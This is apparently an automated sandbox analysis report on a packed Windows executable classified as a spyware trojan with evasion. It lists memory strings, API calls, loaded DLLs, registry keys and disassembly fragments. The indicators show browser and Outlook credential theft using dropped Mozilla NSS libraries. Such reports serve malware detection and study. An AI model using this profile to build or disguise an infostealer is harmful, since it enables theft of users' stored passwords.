Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: FBFCAKKK.0.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe, 00000000.00000002.1953958694.0000000029281000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1936049768.0000000000DA5000.00000004.00000020.00020000.00000000.sdmp, GDHIDHIEGIIIECAKEBFB.0.dr	String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: FBFCAKKK.0.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: JJECGCBGDBKJJKEBFBFHJEBGDG.0.dr	String found in binary or memory: https://www.mozilla.org
Source: file.exe, 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: JJECGCBGDBKJJKEBFBFHJEBGDG.0.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: file.exe, 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: JJECGCBGDBKJJKEBFBFHJEBGDG.0.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: file.exe, 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: file.exe, 00000000.00000003.1879563489.0000000029523000.00000004.00000020.00020000.00000000.sdmp, JJECGCBGDBKJJKEBFBFHJEBGDG.0.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: file.exe, 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/ZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBM
Source: file.exe, 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/lvYnwxfDB8MHxMYXN0UGFzc3xoZG9raWVqbnBpbWFrZWRoYWpoZGxj
Source: JJECGCBGDBKJJKEBFBFHJEBGDG.0.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: file.exe, 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: file.exe, 00000000.00000003.1879563489.0000000029523000.00000004.00000020.00020000.00000000.sdmp, JJECGCBGDBKJJKEBFBFHJEBGDG.0.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

System Summary

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5DED10 malloc,NtFlushVirtualMemory,memset,memset,memset,memset,memset,memcpy,free,memset,memset,memcpy,memset,memset,memset,memset,memset,	0_2_6C5DED10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C61B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	0_2_6C61B700
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C61B8C0 rand_s,NtQueryVirtualMemory,	0_2_6C61B8C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C61B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,	0_2_6C61B910
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5BF280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	0_2_6C5BF280

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0073503B	0_2_0073503B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00613832	0_2_00613832
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005739F3	0_2_005739F3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005C0A6D	0_2_005C0A6D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0055CA6C	0_2_0055CA6C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006152D5	0_2_006152D5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0061DA9D	0_2_0061DA9D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005D7BA8	0_2_005D7BA8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00611E94	0_2_00611E94
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0061A7B1	0_2_0061A7B1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0061BFBE	0_2_0061BFBE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5B35A0	0_2_6C5B35A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5C5440	0_2_6C5C5440
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C62545C	0_2_6C62545C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C62542B	0_2_6C62542B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5F5C10	0_2_6C5F5C10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C62AC00	0_2_6C62AC00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C602C10	0_2_6C602C10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5DD4D0	0_2_6C5DD4D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5C64C0	0_2_6C5C64C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5F6CF0	0_2_6C5F6CF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5BD4E0	0_2_6C5BD4E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6134A0	0_2_6C6134A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C61C4A0	0_2_6C61C4A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5C6C80	0_2_6C5C6C80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5E0512	0_2_6C5E0512
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5DED10	0_2_6C5DED10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5CFD00	0_2_6C5CFD00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5F0DD0	0_2_6C5F0DD0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6185F0	0_2_6C6185F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C626E63	0_2_6C626E63
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5D9E50	0_2_6C5D9E50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5F3E50	0_2_6C5F3E50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5D4640	0_2_6C5D4640
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5BC670	0_2_6C5BC670
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C602E4E	0_2_6C602E4E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5F7E10	0_2_6C5F7E10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C619E30	0_2_6C619E30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C605600	0_2_6C605600
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6276E3	0_2_6C6276E3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5BBEF0	0_2_6C5BBEF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5CFEF0	0_2_6C5CFEF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C614EA0	0_2_6C614EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5D5E90	0_2_6C5D5E90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C61E680	0_2_6C61E680
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5F7710	0_2_6C5F7710
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5C9F00	0_2_6C5C9F00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5E6FF0	0_2_6C5E6FF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5BDFE0	0_2_6C5BDFE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6077A0	0_2_6C6077A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5D8850	0_2_6C5D8850
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5DD850	0_2_6C5DD850
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5FF070	0_2_6C5FF070
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C604820	0_2_6C604820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5C7810	0_2_6C5C7810
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5FB820	0_2_6C5FB820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6250C7	0_2_6C6250C7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5DC0E0	0_2_6C5DC0E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5F58E0	0_2_6C5F58E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5E60A0	0_2_6C5E60A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C60B970	0_2_6C60B970
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C62B170	0_2_6C62B170
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5DA940	0_2_6C5DA940
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5CD960	0_2_6C5CD960
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5F5190	0_2_6C5F5190
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5ED9B0	0_2_6C5ED9B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C612990	0_2_6C612990
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5BC9A0	0_2_6C5BC9A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5F9A60	0_2_6C5F9A60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5F8AC0	0_2_6C5F8AC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5D1AF0	0_2_6C5D1AF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5FE2F0	0_2_6C5FE2F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C622AB0	0_2_6C622AB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5CCAB0	0_2_6C5CCAB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C62BA90	0_2_6C62BA90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5B22A0	0_2_6C5B22A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5E4AA0	0_2_6C5E4AA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5B5340	0_2_6C5B5340
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5CC370	0_2_6C5CC370
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5FD320	0_2_6C5FD320
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6253C8	0_2_6C6253C8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5BF380	0_2_6C5BF380

Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C5F94D0 appears 90 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 002545C0 appears 316 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C5ECBE8 appears 134 times

Source: file.exe, 00000000.00000002.1957319931.000000006C642000.00000002.00000001.01000000.00000008.sdmp	Binary or memory string: OriginalFilenamemozglue.dll0 vs file.exe
Source: file.exe, 00000000.00000002.1957766473.000000006C835000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: OriginalFilenamenss3.dll0 vs file.exe

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe

Static PE information: Section: wrqldbzh ZLIB complexity 0.9947204961556029

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@1/22@0/1

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C617030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,

0_2_6C617030

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00269600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

0_2_00269600

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00263720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,

0_2_00263720

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\E8R74HDF.htm

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: file.exe, 00000000.00000002.1957599890.000000006C7EF000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.1957024440.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1948696633.000000001D353000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: file.exe, 00000000.00000002.1957599890.000000006C7EF000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.1957024440.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1948696633.000000001D353000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: file.exe, 00000000.00000002.1957599890.000000006C7EF000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.1957024440.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1948696633.000000001D353000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: file.exe, 00000000.00000002.1957599890.000000006C7EF000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.1957024440.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1948696633.000000001D353000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: file.exe, 00000000.00000002.1957599890.000000006C7EF000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.1957024440.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1948696633.000000001D353000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000000.00000002.1957599890.000000006C7EF000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.1957024440.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1948696633.000000001D353000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: file.exe, 00000000.00000002.1957024440.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1948696633.000000001D353000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: file.exe, 00000000.00000003.1763379537.000000001D254000.00000004.00000020.00020000.00000000.sdmp, DGHCBAAEHCFIDGDHJEHC.0.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe, 00000000.00000002.1957024440.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1948696633.000000001D353000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: file.exe, 00000000.00000002.1957024440.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1948696633.000000001D353000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: file.exe	String found in binary or memory: ft.com/en-us/office/examples-of-office-product-keys-7d48285b-20e8-4b9b-91ad-216e34163bad?wt.mc_id=enterpk2016&ui=en-us&rs=en-us&ad=us https://support.microsoft.com/en-us/topic/install-the-english-language-pack-for-32-bit-office-94ba2e0b-638e-4a92-8857-2cb5ac1d
Source: file.exe	String found in binary or memory: m/en-us/office/examples-of-office-product-keys-7d48285b-20e8-4b9b-91ad-216e34163bad?wt.mc_id=enterpk2016&ui=en-us&rs=en-us&ad=us https://support.microsoft.com/en-us/topic/install-the-english-language-pack-for-32-bit-office-94ba2e0b-638e-4a92-8857-2cb5ac1d8e17?
Source: file.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140.dll	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Jump to behavior

Source: file.exe

Static file information: File size 1837568 > 1048576

Source: file.exe

Static PE information: Raw size of wrqldbzh is bigger than: 0x100000 < 0x19a800

Source:	Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.1957182154.000000006C62D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.1957599890.000000006C7EF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source:	Binary string: nss3.pdb source: file.exe, 00000000.00000002.1957599890.000000006C7EF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: mozglue.pdb source: file.exe, 00000000.00000002.1957182154.000000006C62D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe

Unpacked PE file: 0.2.file.exe.250000.0.unpack :EW;.rsrc :W;.idata :W; :EW;wrqldbzh:EW;ucfplqsw:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;wrqldbzh:EW;ucfplqsw:EW;.taggant:EW;

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00269860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00269860

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: file.exe

Static PE information: real checksum: 0x1c38ca should be: 0x1c2ae9

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: wrqldbzh
Source: file.exe	Static PE information: section name: ucfplqsw
Source: file.exe	Static PE information: section name: .taggant
Source: msvcp140[1].dll.0.dr	Static PE information: section name: .didat
Source: nss3.dll.0.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3.dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr	Static PE information: section name: .didat

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004C0849 push 6300D860h; mov dword ptr [esp], ebx	0_2_004C0877
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006B386D push edx; mov dword ptr [esp], eax	0_2_006B388E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0026B035 push ecx; ret	0_2_0026B048
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0065207F push esi; mov dword ptr [esp], eax	0_2_00652581
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0065207F push edx; mov dword ptr [esp], ecx	0_2_0065258B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00655843 push 38F98A2Ch; mov dword ptr [esp], eax	0_2_0065591C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006FE829 push 05C1EE5Ah; mov dword ptr [esp], edx	0_2_006FE849
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006FE829 push edx; mov dword ptr [esp], ebx	0_2_006FE898
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0073503B push edx; mov dword ptr [esp], esp	0_2_007350C8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0073503B push esi; mov dword ptr [esp], ebp	0_2_007351C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00613832 push 18AF9835h; mov dword ptr [esp], ebx	0_2_0061383A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00613832 push ecx; mov dword ptr [esp], 199ABD97h	0_2_00613841
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00613832 push esi; mov dword ptr [esp], edx	0_2_006138C4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00613832 push edi; mov dword ptr [esp], edx	0_2_0061392F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00613832 push 448D9BFCh; mov dword ptr [esp], esi	0_2_00613943
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00613832 push ecx; mov dword ptr [esp], eax	0_2_00613965
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00613832 push esi; mov dword ptr [esp], ebp	0_2_0061399D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00613832 push 0EE7F74Bh; mov dword ptr [esp], ecx	0_2_00613A20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00613832 push esi; mov dword ptr [esp], ebx	0_2_00613A24
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00613832 push edi; mov dword ptr [esp], ecx	0_2_00613A3A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00613832 push 414BAEE0h; mov dword ptr [esp], edi	0_2_00613A4B
